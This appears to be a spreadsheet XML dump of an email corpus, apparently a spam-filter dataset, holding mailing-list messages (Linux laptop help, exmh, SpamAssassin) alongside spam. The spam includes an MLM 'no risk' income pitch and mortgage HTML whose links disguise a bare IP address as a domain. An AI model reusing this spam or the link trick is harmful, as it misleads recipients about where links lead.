 &amp;nbsp;&lt;a href="http://www.lockergnome.com/recommend.html"&gt;Recommend Us!&lt;/a&gt;&lt;br&gt;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href="https://www.sandhills.com/secure/smartcomputing/cpufreetrial3.asp?source=cpu491bonus"&gt;Computer Power User&lt;/a&gt;&lt;br&gt;
 &lt;p&gt;
 &amp;nbsp;&lt;A href="http://www.lockergnome.com/submit.html"&gt;Submit Your Opinion&lt;/a&gt;&lt;br&gt;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HREF="http://www.amazon.com/exec/obidos/ASIN/0966103254/ref=ase_lockergnome/"&gt;Get Chris's Book&lt;/A&gt;&lt;br&gt;
 &lt;p&gt;
 &amp;nbsp;&lt;a href="&amp;#109;&amp;#97;&amp;#105;&amp;#108;&amp;#116;&amp;#111;&amp;#58;&amp;#102;&amp;#101;&amp;#101;&amp;#100;&amp;#98;&amp;#97;&amp;#99;&amp;#107;&amp;#64;&amp;#108;&amp;#111;&amp;#99;&amp;#107;&amp;#101;&amp;#114;&amp;#103;&amp;#110;&amp;#111;&amp;#109;&amp;#101;&amp;#46;&amp;#99;&amp;#111;&amp;#109;?subject=Lockergnome Site Feedback"&gt;General Feedback&lt;/a&gt;&lt;br&gt;
 &amp;nbsp;&lt;a href="mailto:jake@lockergnome.com?subject=Lockergnome Digital Media Comment"&gt;E-mail the Editor&lt;/a&gt;&lt;br&gt;
 &amp;nbsp;&lt;A HREF="http://jake.iowageek.com/"&gt;Jake's Blog&lt;/A&gt;&lt;BR&gt;
 &lt;p&gt;
 &amp;nbsp;&lt;a href="http://www.lockergnome.com/windowsdaily.xml"&gt;Our XML / RSS Feed&lt;/a&gt;&lt;br&gt;
 &amp;nbsp;&lt;a href="http://www.lockergnome.com/options.html#syndicate"&gt;Syndicate Our Tips&lt;/a&gt;&lt;br&gt;
 &amp;nbsp;&lt;a href="http://www.lockergnome.com/images/lockerlink.gif"&gt;Link To Lockergnome&lt;/a&gt;&lt;br&gt;
 &lt;p align="center"&gt;&lt;a href="http://www.lockergnome.com/windowsdaily.xml"&gt;&lt;img src="http://www.lockergnome.com/images/xml.gif" alt="Syndicate Today's Content" height="14" width="36" border="0"&gt;&lt;/a&gt;
 &lt;p&gt;&lt;br&gt;
 &lt;font style="font-size: 8pt" face="Verdana, Tahoma, Arial" size="1"&gt;
 &lt;table border="0"&gt;&lt;tr&gt;&lt;td&gt;&lt;a href="http://www.lockergnome.com/webcam.html"&gt;
 &lt;img width="125" height="94" alt="Lockergnome Webcam Image" src="http://www.lockergnome.com/images/webcam/jakecam.jpg"&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td align="center"&gt;&lt;font size="1" face="Tahoma,Arial"&gt;CLICK HERE TO ZOOM&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
 &lt;/font&gt;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class="sidebar"&gt;GNOMEMUSIC&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;br&gt;
 &lt;table border="0"&gt;&lt;tr&gt;&lt;td&gt;&lt;a href="http://www.netmusiccountdown.com"&gt;
 &lt;img border="0" alt="Net Music Countdown" src="http://images.lockergnome.com/images/nmclogo.gif"&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;&lt;p&gt;&lt;br&gt;
 &lt;a href="http://netmusiccountdown.com/news/article.php?id=1k32ni"
 target=_blank&gt;&lt;b&gt;Nickelback's Too Hot For Canada&lt;/b&gt;&lt;/a&gt;
 &lt;br&gt;
 Nickelback fans and Camrose Canada may be seeing a special low tech version of the NMC eCharters' Kiss-style stage...
 &lt;br&gt;
 &lt;br&gt;
 &lt;a href="http://netmusiccountdown.com/news/article.php?id=1a54ma"
 target=_blank&gt;&lt;b&gt;Madonna Plays Bond's Foil&lt;/b&gt;&lt;/a&gt;
 &lt;br&gt;
 Yes, music fans, it has been confirmed. Madonna will show up in the next Bond movie, Die Another Day. Reports say...
 &lt;br&gt;
 &lt;br&gt;
 &lt;a href="http://netmusiccountdown.com/news/article.php?id=1d40da"
 target=_blank&gt;&lt;b&gt;Dixie Chicks- DMB CMT Show Cancelled&lt;/b&gt;&lt;/a&gt;
 &lt;br&gt;
 The much-ballyhooed paring of the Dixie Chicks and the Dave Matthews Band may never see the light of day. Here's...
 &lt;br&gt;
 &lt;br&gt;
 &lt;a href="http://netmusiccountdown.com/news/article.php?id=1r27we"
 target=_blank&gt;&lt;b&gt;Weezer Singer Goes to Crazy Town&lt;/b&gt;&lt;/a&gt;
 &lt;br&gt;
 Weezer Singer Goes to Crazy Town Weezer front man Rivers Cuomo has lent his fingers to a track off Crazy Town's...
 &lt;br&gt;
 &lt;br&gt;
 &lt;a href="http://netmusiccountdown.com/news/article.php?id=1n29br"
 target=_blank&gt;&lt;b&gt;The Boss Will Barnstorm&lt;/b&gt;&lt;/a&gt;
 &lt;br&gt;
 Bruce Springsteen and the E Street Band are hitting the road to support their new album The Rising and it will be a...
 &lt;br&gt;
 &lt;br&gt;
 &lt;a href="http://netmusiccountdown.com/news/article.php?id=1n16mi"
 target=_blank&gt;&lt;b&gt;Not Much Sympathy for Michael&lt;/b&gt;&lt;/a&gt;
 &lt;br&gt;
 The King of Pop's claim that Sony Music is racist and has treated him badly isn't getting him much support in the... 
 &lt;p&gt;&amp;nbsp;&lt;p&gt;
 &lt;table cellpadding="0" cellspacing="0" border="0" width="100%" bgcolor="#FFEEDD"&gt;&lt;tr&gt;&lt;td&gt;&lt;p class="sidebar"&gt;GNOMECREDITS&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;br&gt;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&lt;p&gt;&amp;nbsp;&lt;p&gt;&amp;nbsp;Search Past Issues:&lt;br&gt;
 &lt;img src="http://images.lockergnome.com/images/blank.gif" width="135" height="3"&gt;&lt;table width="100%" align="center" border="0" cellspacing="0" cellpadding="0"&gt;
  &lt;tr&gt;&lt;td align="left" valign="middle"&gt;&lt;p class="sidebar"&gt;
  &lt;table border="0" cellspacing="5" cellpadding="0"&gt;&lt;tr&gt;
  &lt;form method="post" action="http://www.lockergnome.com/cgi-bin/htsearch"&gt;
  &lt;input type="hidden" name="method" value="and"&gt;
  &lt;input type="hidden" name="format" value="long"&gt;
  &lt;input type="hidden" name="sort" value="score"&gt;
  &lt;input type="hidden" name="config" value="htdig"&gt;
  &lt;input type="hidden" name="restrict" value=""&gt;
  &lt;input type="hidden" name="exclude" value=""&gt;
  &lt;td&gt;&lt;input type="text" size="9" name="words" value=""&gt;
  &lt;input type="submit" value="Go"&gt;&lt;BR&gt;
   &lt;/td&gt;&lt;/form&gt;&lt;/tr&gt;&lt;/table&gt;
  &lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;/p&gt;
 &lt;p&gt;&amp;nbsp;&lt;p&gt;
 &lt;center&gt;&lt;a href="http://www.gnomedex.com/"&gt;&lt;img src="http://www.lockergnome.com/images/ads/gnomedex_vert.gif" width="125" height="400" border="0"&gt;&lt;/a&gt;&lt;/center&gt;
 &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
 &lt;/body&gt;&lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi Gianni,
 A very good resource for this is:
 http://linux-laptop.net/
 or:
 http://www.mobilix.org/
 They have walk through guides for an umber of latops, highlighting what
 to look out for.
 Have a look there, and let us know if you succeed.
 Cheers,
 Phil Trickett
 On Wed, 2002-12-04 at 11:36, Gianni Ponzi wrote:
 &gt; Hi all
 &gt; 
 &gt; 
 &gt; I have a prob when trying to install Linux (tried RedHat, Suse) on my
 &gt; laptop. I can start the install but after about 2min, the whole pc just
 &gt; dies.
 &gt; I know it's not a Linux prob and here is what I have encountered:
 &gt; 
 &gt; I had the same problem when installing Win on it and eventually sorted it
 &gt; out by disabling the infrared port. I'm guessing this might be same prob
 &gt; although I'm not sure. I am very new to Linux so it's not that easy for me
 &gt; to work it out. I did manage to follow the setup procedure at one stage
 &gt; (using images on disks) and it cuts out either as it's trying to verify what
 &gt; CD-Rom I have or just after (hence my suspicion of the infrared port again).
 &gt; 
 &gt; can anyone help ?
 &gt; 
 &gt; thanks
 &gt; Gianni
 &gt; 
 &gt; 
 &gt; ************************************************************************
 &gt; This e-mail and any files transmitted with it are confidential
 &gt; and intended solely for the use of the individual or entity to
 &gt; which they are addressed. If you have received this e-mail
 &gt; in error, please notify the EPA postmaster - postmaster@epa.ie
 &gt; 
 &gt; The opinions contained within are personal to the sender and 
 &gt; do not necessarily reflect the policy of the Environmental 
 &gt; Protection Agency.
 &gt; 
 &gt; This footnote also confirms that this e-mail message has been
 &gt; swept by MIMEsweeper for the presence of computer viruses.
 &gt; 
 &gt; ************************************************************************
 -- 
 Philip Trickett &lt;phil@techworks.ie&gt;
 TechWorks Marine Ltd
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: New Sequences Window
</t>
  </si>
  <si>
    <t xml:space="preserve">--==_Exmh_-1828408717P
 Content-Type: text/plain; charset=us-ascii
 I've just checked in a rather large patch which replaces the Unseen Window 
 with a new Sequences Window.
 Since the preference items are different, you'll need to turn the display of 
 the sequences window on in the preferences even if you had the unseen window 
 enabled.  I couldn't figure out how to default the preferences to match the 
 unseen window.
 I'm hoping that all people with no additional sequences will notice are purely 
 cosmetic changes.
 For those who have other sequences defined, the window will widen to display 
 the other sequences.  Preferences allow you to say if you want a given 
 sequence display to never show or to always show.
 I've also changed the ftoc colorization as discussed briefly on the list a 
 week or so ago.
 The two things that I know I need to do are to fix the performance issue that 
 I think is what Anders was seeing yesterday and to catch the documentation up 
 with the code.
 My wife is out for an "evening with the girls" tonight, so I should be able to 
 work on the performance issue tonight and check it in after some testing in a 
 day or two.
 I hope I didn't break very much with all the changes I made...
 Chris
 -- 
 Chris Garrigues                 http://www.DeepEddy.Com/~cwg/
 virCIO                          http://www.virCIO.Com
 716 Congress, Suite 200
 Austin, TX  78701		+1 512 374 0500
   World War III:  The Wrong-Doers Vs. the Evil-Doers.
 --==_Exmh_-1828408717P
 Content-Type: application/pgp-signature
 -----BEGIN PGP SIGNATURE-----
 Version: GnuPG v1.0.6 (GNU/Linux)
 Comment: Exmh version 2.2_20000822 06/23/2000
 iD8DBQE9YsJjK9b4h5R0IUIRAlPcAJwOagra2EcjW/IcjmIB0RNkKUUXUQCfapbo
 e4f/pt3xlgPvgzpJ94HmwP0=
 =YPYq
 -----END PGP SIGNATURE-----
 --==_Exmh_-1828408717P--
 _______________________________________________
 Exmh-workers mailing list
 Exmh-workers@redhat.com
 https://listman.redhat.com/mailman/listinfo/exmh-workers
</t>
  </si>
  <si>
    <t xml:space="preserve">On Fri, Jul 19, 2002 at 11:47:39PM +0100, Niall O Broin wrote:
 &gt; &gt; I know this is not strictly a 'Linux' issue but any help would be appreciated
 &gt; Microsoft has very much made this a Linux issue - it has attempted to imply
 &gt; that any company using GPL software must make everything it owns public and
 &gt; it must be true - that nice man from Microsoft wouldn't lie, would he ?
 but that's just stupid.  microsoft s/w covers a subset of applications
 that are under the gpl.  there are gpl word processors, there's a
 microsoft wp; there are various language compilers and interpreters under
 the gpl, microsoft has their visual compilers.  and so on.  and just
 like the gpl apps, the microsoft apps are distributed under a license.
 that license says lots of things, and there are various licenses used by
 microsoft, but in a nutshell they all pretty much say: you can't copy,
 distribute or modify their s/w; you can't sell it multiple times.
 so does anyone think that applies to their wp documents or their visual
 c++ code?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</si>
  <si>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Re: Scramjet works? : HyShot experiment takes-off
</t>
  </si>
  <si>
    <t xml:space="preserve">Quoth R. A. Hettinga:
 &gt;The HyShot experiment - attempting the world`s first flight test of the
 &gt;supersonic combustion process - was launched at 1135 local time (1205 AEST)
 &gt;at the Woomera Prohibited Area, 500km north of Adelaide today.
 Eh?  AFAIK, the Russian Kholod program achieved successful supersonic
 combustion in a scramjet about 10 years ago.
 Bye,
   Rob.
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: FYI: WSE 2002
</t>
  </si>
  <si>
    <t xml:space="preserve">FYI, members of this list might be interested in the 4th International
 Workshop on Web Site Evolution (WSE 2002), being held October 2, 2002, in
 Montreal, Canada.
 http://star.itc.it/wse2002/
 - Jim
 &gt;&gt;From the Web page:
  The potential of the Web as a vehicle for offering a variety of services is
 becoming more apparent as Web sites evolve their contents from static
 information to more dynamic and interactive forms. A number of new standards
 and commercial products are emerging, offering a basis for developing
 Web-based services from dynamic composible resources, extending both the
 range and scope of services that can be made available through the Web.
 The goal of this one-day workshop is to bring together members of the Web
 design, software engineering, and information technology communities to
 discuss techniques for migrating to Web services. Architectural styles and
 tool support for service-based Web sites are currently quite diverse.
 Expertise in constructing service-based Web pages is quite limited, and
 experience accounts are lacking. The explosion of non-traditional computing
 platforms for browsing the Web, such as PDAs, WAP-enabled phones, and
 Internet appliances, is forcing Web professionals to rethink the separation
 of form from content and the range and scope of services offered via the
 Web.
 WSE 2002 will provide an opportunity for the exchange of information related
 to exciting new research and empirical results in areas including (but not
 limited to):
 *   Migrating to Web services
 *   Web quality determination and improvement through process and product
 control
 *   Enhancing Web sites to make them more accessible, reliable, and usable
 *   Analyzing and reverse-engineering Web site content and structure
 *   Making Web site content available in multiple formats for multiple
 platforms
 *   Applying traditional software engineering activities such as
 architecture, metrics, and testing to Web sites
 *   Case studies of large-scale Web site reuse, reengineering, and evolution
 WSE 2002 is co-located with the IEEE International Conference on Software
 Maintenance (ICSM 2002). ICSM is the IEEE Computer Society's flagship event
 focused on the modernization of existing systems. ICSM 2002's theme of
 "maintaining distributed heterogeneous systems" nicely compliments WSE
 2002's overall theme and goals.
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi !
 My name is Wayne Harrison and I would like to share a
 genuine, NO RISK opportunity with you.
 What I have to share with you is not like any other internet
 opportunities you have seen before. It is first and foremost
 a CONSUMER OPPORTUNITY.
 It also offers you the ability to have a share of a
 new Internet Mall to buy at wholesale for yourself
 or to send others and make commissions on their
 purchases.
 Besides this, it also offers a unique networking program
 using a principle we call "REFERNET" Marketing. This is no
 "get rich quick" scheme, but rather a credible
 and realistic way to save money and gradually develop
 what can become a large, recurring residual income.
 What's the best thing about this opportunity?
 You can "try it before you buy it". That's right.
 You can join the DHS Club for FREE with no risk
 or obligation. 
 Make sure and check out the DHS Club's own ISP, ClubDepot.com.
 You'll get Unlimited Internet Access for only $14.95 / month! Included
 are 5 email addresses and 5 MB web space.
 To get your free membership and to learn more about
 the DHS Club and our exciting REFERNET Marketing
 Program and Postlaunch, visit my web page at
 http://lwharris.0catch.com/  
 Remember, you have nothing to lose and potentially a lot to gain!
 Best Regards,
 Wayne Harrison
 To be removed from future mailings, simply
 respond with REMOVE in the subject line.
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Tony L. Svanstrom wrote:
 &gt;On Sun, 15 Sep 2002 the voices made Marc Perkel write:
 &gt;
 &gt;&gt;Right now we have one spam status flag indicating that a message is or
 &gt;&gt;is not spam. The idea being that the end user perhaps make a rule that
 &gt;&gt;would move the spam flagged messages into a spam folder and thus gain
 &gt;&gt;some time by presorting messages into to piles.
 &gt;&gt;
 &gt;
 &gt; If you (people) don't know enough to filter on the actual score they've got
 &gt;the "stars", which will give them more than enough levers, if they want it.
 &gt;
 &gt;
 &gt;	/Tony
 &gt;
 Sure - we developers know that - but what I'm talking about is making it 
 easier for END USERS to figure out.
 -------------------------------------------------------
 This sf.net email is sponsored by:ThinkGeek
 Welcome to geek heaven.
 http://thinkgeek.com/sf
 _______________________________________________
 Spamassassin-devel mailing list
 Spamassassin-devel@lists.sourceforge.net
 https://lists.sourceforge.net/lists/listinfo/spamassassin-devel
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Christmas is coming to all Ryanair passe
</t>
  </si>
  <si>
    <t xml:space="preserve">
 Our Car Hire partners, Hertz, have some great deals on car rental over   
 the Christmas period.
 To book online click http://www.ryanair.com/redirect/hertzredirect.html
 United Kingdom
  + Rent a Group A Car (Ford Fiesta 1.25 or similar) for the fully   
 inclusive daily price from Euro 38.13
 Ireland
  + Rent a Group B Car (Opel Corsa 1.2 or similar)for the fully inclusive   
 daily price from Stg 38.00
 France
  + Rent a Group A Car (Opel Corsa Comfort 1.0 or similar) for the fully   
 inclusive daily price from Stg 18.68
 Italy
  + Rent a Group A Car (Opel Corsa 1.2 or similar) for the fully inclusive   
 daily price from Stg 20.44
 Germany
 + Rent a Group A Car (VW Lupo 1.0 or similar) for the fully
 inclusive daily price from Stg 18.55
 Austria
 + Rent a Group A Car (Ford Fiesta 1.3 or similar) for the fully
 inclusive daily price from Stg 33.63
 Belgium
 + Rent a Group A Car (Ford Fiesta 1.3 or similar) for the fully
 inclusive daily price from Stg 20.43
 Netherlands
 + Rent a Group A Car (Fiat Seicento 0.9 or similar) for the fully
 inclusive daily price from Stg 15.10
 Norway
 + Rent a Group A Car (VW Lupo 1.0 or similar) for the fully
 inclusive daily price from Stg 34.52
 Sweden
 + Rent a Group A Car (Ford Fiesta 1.3 or similar) for the fully
 inclusive daily price from Stg 27.54
 Denmark
 + Rent a Group A Car (Opel Corsa 1.4 or  similar) for the fully
 inclusive daily price from Stg 35.96
 + The	 daily rate quotes are based on a 7 day car rental quotation,
 picked up between 23rd - 29th December inclusive.
 HERTZ FULLY INCLUSIVE RATES INCLUDE:
 UNLIMITED MILEAGE, COLLISION DAMAGE WAIVER,
 THEFT PROTECTION, AIRPORT FEE AND TAX
 To book online click http://www.ryanair.com/redirect/hertzredirect.html
 or call the Ryanair Direct - Hertz priority booking line on:
 0871 246 0002(UK only)
 0818 304 304 (Ireland)
 00 353 818 304 304 (International Calls)
 Rates are subject to availability.
 Ryanair airport locations only.
 Drivers must be over 25 with a full clean driving licence
 Enjoy a Free Upgrade in the Netherlands!
 Make more of your next trip to the Netherlands with a free upgrade when   
 you book a CCMR Ford Focus 1.6 or above until 31 December 2002!
 To take advantage of this offer, simply:
 *	Click on the book it on-line button below
 *	Select the car you wish to pay for and you will be upgraded to the next   
 car group at time of rental, for example, if you book an IDMN Seat Toledo   
 1.6 you will be upgraded to a SCMR Audi A4 or similar.
 Termsandconditions
 This offer is exclusive to Ryanair customers. Offer is valid for rentals   
 picked up at Eindhoven airport until 31 December 2002. Offer valid on   
 reservations of car group CCMR or above and excludes automatics. Offer is   
 subject to availability. Hertz standard terms and conditions apply.
 To book online click http://www.ryanair.com/redirect/hertzdirect.html
 Or call the Ryanair Direct - Hertz priority booking line on:
 0871 246 0002 ( UK Only )
 0818 304 304 ( Ireland )
 00 353 818 304 304 ( International Calls )
 ====================================================================
 E-MAIL DISCLAIMER
 This e-mail and any files and attachments transmitted with it
 are confidential and may be legally privileged. They are intended
 solely for the use of the intended recipient.  Any views and
 opinions expressed are those of the individual author/sender
 and are not necessarily shared or endorsed by Ryanair Holdings plc
 or any associated or related company. In particular e-mail
 transmissions are not binding for the purposes of forming
 a contract to sell airline seats, directly or via promotions,
 and do not form a contractual obligation of any type.
 Such contracts can only be formed in writing by post or fax,
 duly signed by a senior company executive, subject to approval
 by the Board of Directors.
 The content of this e-mail or any file or attachment transmitted
 with it may have been changed or altered without the consent
 of the author.  If you are not the intended recipient of this e-mail,
 you are hereby notified that any review, dissemination, disclosure,
 alteration, printing, circulation or transmission of, or any
 action taken or omitted in reliance on this e-mail or any file
 or attachment transmitted with it is prohibited and may be unlawful.
 If you have received this e-mail in error
 please notify Ryanair Holdings plc by emailing postmaster@ryanair.ie
 or contact Ryanair Holdings plc, Dublin Airport, Co Dublin, Ireland.
 =====================================================================
 E-MAIL DISCLAIMER
 This e-mail and any files and attachments transmitted with it 
 are confidential and may be legally privileged. They are intended 
 solely for the use of the intended recipient.  Any views and 
 opinions expressed are those of the individual author/sender 
 and are not necessarily shared or endorsed by Ryanair Holdings plc 
 or any associated or related company. In particular e-mail 
 transmissions are not binding for the purposes of forming 
 a contract to sell airline seats, directly or via promotions, 
 and do not form a contractual obligation of any type.   
 Such contracts can only be formed in writing by post or fax, 
 duly signed by a senior company executive, subject to approval 
 by the Board of Directors.
 The content of this e-mail or any file or attachment transmitted 
 with it may have been changed or altered without the consent 
 of the author.  If you are not the intended recipient of this e-mail, 
 you are hereby notified that any review, dissemination, disclosure, 
 alteration, printing, circulation or transmission of, or any 
 action taken or omitted in reliance on this e-mail or any file 
 or attachment transmitted with it is prohibited and may be unlawful.
 If you have received this e-mail in error 
 please notify Ryanair Holdings plc by emailing postmaster@ryanair.ie
 or contact Ryanair Holdings plc, Dublin Airport, Co Dublin, Ireland.  
 ---
 You are currently subscribed to customers as: yyyy-ryanair@spamassassin.taint.org
 To unsubscribe send a blank email to leave-customers-949326K@mail.ryanairmail.com
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: ADV: Extended Auto Warranty -- even older cars... whnyf
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: *You CAN have the best MORTGAGE rate*             21570
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;head&gt;
 &lt;title&gt;DEAR HOMEOWNER,&lt;/title&gt;
 &lt;meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3Diso-8859=
 -1"&gt;
 &lt;/head&gt;
 &lt;style type=3D"text/css"&gt;
 main {  font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12=
 px; color: #212121}
 footer {  font-family: Verdana, Arial, Helvetica, sans-serif; font-size: =
 10px; color: #000000}
 A:link {text-decoration: none; color: #ED1C24}
 A:visited {text-decoration: none; color: #ED1C24}
 A:active {text-decoration: none; color: #F7941D}
 A:hover {text-decoration: none; color: #000000}
 A.yellow:link {text-decoration: none; color: #FFFFFF}
 A.yellow:visited {text-decoration: none; color: #FFFFFF}
 A.yellow:active {text-decoration: none; color: #000000}
 A.yellow:hover {text-decoration: none; color: #E6E6E6}
 &lt;/style&gt;
 &lt;body bgcolor=3D"#DADADA" topmargin=3D"4"&gt;
 &lt;table width=3D"600" border=3D"1" cellspacing=3D"0" cellpadding=3D"0" alig=
 n=3D"center" bordercolor=3D"#000066" class=3D"main" bgcolor=3D"#F2F2F2"&gt;
   &lt;tr&gt; 
     &lt;td&gt;
       &lt;table width=3D"560" align=3D"center" border=3D"0" cellspacing=3D"2"=
  cellpadding=3D"8"&gt;
         &lt;tr&gt; 
           &lt;td&gt;
             &lt;p&gt;&lt;b&gt;&lt;font size=3D"4"&gt;Dear &lt;/font&gt;&lt;font size=3D"4" color=3D"#=
 0000CC"&gt;HOMEOWNER,&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;
           &lt;/td&gt;
         &lt;/tr&gt;
       &lt;/table&gt;
     &lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt;
     &lt;td bgcolor=3D"#000099"&gt; 
       &lt;table width=3D"600" border=3D"0" cellspacing=3D"6" cellpadding=3D"6=
 " class=3D"main"&gt;
         &lt;tr&gt;
           &lt;td&gt;
             &lt;p align=3D"center"&gt;&lt;b&gt;&lt;font color=3D"#FFFFFF" size=3D"3"&gt;Inte=
 rest rates are at their lowest point in 40 
               years!&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;
           &lt;/td&gt;
         &lt;/tr&gt;
       &lt;/table&gt;
     &lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt;
     &lt;td&gt;
       &lt;table width=3D"590" border=3D"0" cellspacing=3D"2" cellpadding=3D"4=
 " class=3D"main"&gt;
         &lt;tr&gt; 
           &lt;td width=3D"50%" valign=3D"top"&gt;
             &lt;div align=3D"center"&gt; &lt;b&gt;&lt;font size=3D"5"&gt;Let us do the shopp=
 ing for 
               you... AND IT'S FREE!&lt;/font&gt;&lt;/b&gt; 
               &lt;p&gt;&lt;img src=3D"http://61.129.81.70/pix2/images/ad2.gif" widt=
 h=3D"142" height=3D"218"&gt;&lt;/p&gt;
             &lt;/div&gt;
           &lt;/td&gt;
           &lt;td width=3D"50%" valign=3D"top"&gt;&lt;font size=3D"3"&gt;&lt;i&gt;&lt;br&gt;
             Our nationwide network of lenders have hundreds of different l=
 oan 
             programs to fit your current situation:&lt;/i&gt; &lt;b&gt; 
             &lt;ul&gt;
               &lt;li&gt;Refinance&lt;/li&gt;
               &lt;li&gt;Second Mortgage&lt;/li&gt;
               &lt;li&gt;Debt Consolidation&lt;/li&gt;
               &lt;li&gt;Home Improvement&lt;/li&gt;
               &lt;li&gt;Purchase &lt;/li&gt;
             &lt;/ul&gt;&lt;/b&gt;
             &lt;p&gt;&lt;/p&gt;
             &lt;p&gt;Please &lt;b&gt;&lt;a href=3D"http://www.812191956734203545847582013=
 @61.129.81.70/pix2/mortgageform.htm"&gt;CLICK HERE&lt;/a&gt;&lt;/b&gt; to fill out a quic=
 k form. Your 
               request will be transmitted to our network of mortgage speci=
 alists.&lt;/p&gt;&lt;/font&gt;
           &lt;/td&gt;
         &lt;/tr&gt;
       &lt;/table&gt;
       &lt;table width=3D"600" border=3D"0" cellspacing=3D"2" cellpadding=3D"2=
 "&gt;
         &lt;tr&gt;
           &lt;td bgcolor=3D"#0D86FF"&gt; &lt;font size=3D"2"&gt; 
             &lt;div align=3D"center"&gt;&lt;br&gt;
             &lt;/div&gt;
             &lt;/font&gt;&lt;/td&gt;
         &lt;/tr&gt;
       &lt;/table&gt;
       &lt;table width=3D"600" border=3D"0" cellspacing=3D"2" cellpadding=3D"8=
 " class=3D"main"&gt;
         &lt;tr&gt;
           &lt;td bgcolor=3D"#0066CC"&gt; 
             &lt;div align=3D"center"&gt;
               &lt;div align=3D"center"&gt;&lt;b&gt;&lt;font size=3D"2"&gt;This service is &lt;a=
  href=3D"http://www.812191956757575734203545847582013@61.129.81.70/pix2/mo=
 rtgageform.htm" class=3D"yellow"&gt;100% 
                 FREE&lt;/a&gt; to home owners and new home buyers without any ob=
 ligation.&lt;/font&gt;&lt;/b&gt;&lt;/div&gt;
             &lt;/div&gt;
             &lt;/td&gt;
         &lt;/tr&gt;
       &lt;/table&gt;
     &lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
 &lt;table align=3D"center" width=3D"600" cellspacing=3D"2" cellpadding=3D"2" =
 border=3D"0" class=3D"footer"&gt;
   &lt;tr&gt; 
     &lt;td colspan=3D"2"&gt;&lt;br&gt;
       &lt;font color=3D"ED1C24"&gt;Did you receive an email advertisement in err=
 or?&lt;/font&gt; 
       Our goal is to only target individuals who would like to take advant=
 age 
       of our offers. If you'd like to be removed from our mailing list, pl=
 ease 
       click on the link below. You will be removed immediately and automat=
 ically 
       from all of our future mailings.&lt;br&gt;
       &lt;br&gt;
     &lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt; 
     &lt;td&gt;We protect all email addresses from other third parties. Thank you=
 &lt;/td&gt;
     &lt;td align=3D"right"&gt;&lt;a href=3D"http://61.129.81.52/remove/remove.htm"&gt;=
 Please remove me.&lt;/a&gt;&lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
 &lt;/body&gt;
 &lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Looking for a second MORTGAGE?               11925
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;head&gt;
 &lt;title&gt;DEAR HOMEOWNER,&lt;/title&gt;
 &lt;meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3Diso-8859=
 -1"&gt;
 &lt;/head&gt;
 &lt;style type=3D"text/css"&gt;
 main {  font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12=
 px; color: #212121}
 footer {  font-family: Verdana, Arial, Helvetica, sans-serif; font-size: =
 10px; color: #000000}
 A:link {text-decoration: none; color: #ED1C24}
 A:visited {text-decoration: none; color: #ED1C24}
 A:active {text-decoration: none; color: #F7941D}
 A:hover {text-decoration: none; color: #000000}
 A.yellow:link {text-decoration: none; color: #FFFFFF}
 A.yellow:visited {text-decoration: none; color: #FFFFFF}
 A.yellow:active {text-decoration: none; color: #000000}
 A.yellow:hover {text-decoration: none; color: #E6E6E6}
 &lt;/style&gt;
 &lt;body bgcolor=3D"#DADADA" topmargin=3D"4"&gt;
 &lt;table width=3D"600" border=3D"1" cellspacing=3D"0" cellpadding=3D"0" alig=
 n=3D"center" bordercolor=3D"#000066" class=3D"main" bgcolor=3D"#F2F2F2"&gt;
   &lt;tr&gt;&lt;td&gt;&lt;table width=3D"560" align=3D"center" border=3D"0" cellspacing=3D=
 "2" cellpadding=3D"8"&gt;&lt;tr&gt;&lt;td&gt;
     &lt;p&gt;&lt;b&gt;&lt;font size=3D"4"&gt;Dear &lt;/font&gt;&lt;font size=3D"4" color=3D"#0000CC"&gt;=
 HOMEOWNER,&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;
   &lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td bgcolor=3D"#000099"&gt;&lt;table width=3D"=
 600" border=3D"0" cellspacing=3D"6" cellpadding=3D"6" class=3D"main"&gt;&lt;tr&gt;&lt;=
 td&gt;
     &lt;p align=3D"center"&gt;&lt;b&gt;&lt;font color=3D"#FFFFFF" size=3D"3"&gt;Interest rat=
 es are at their lowest point in 40 years!&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;
   &lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/td&gt;&lt;/tr&gt;
   &lt;tr&gt;&lt;td&gt;&lt;table width=3D"590" border=3D"0" cellspacing=3D"2" cellpadding=3D=
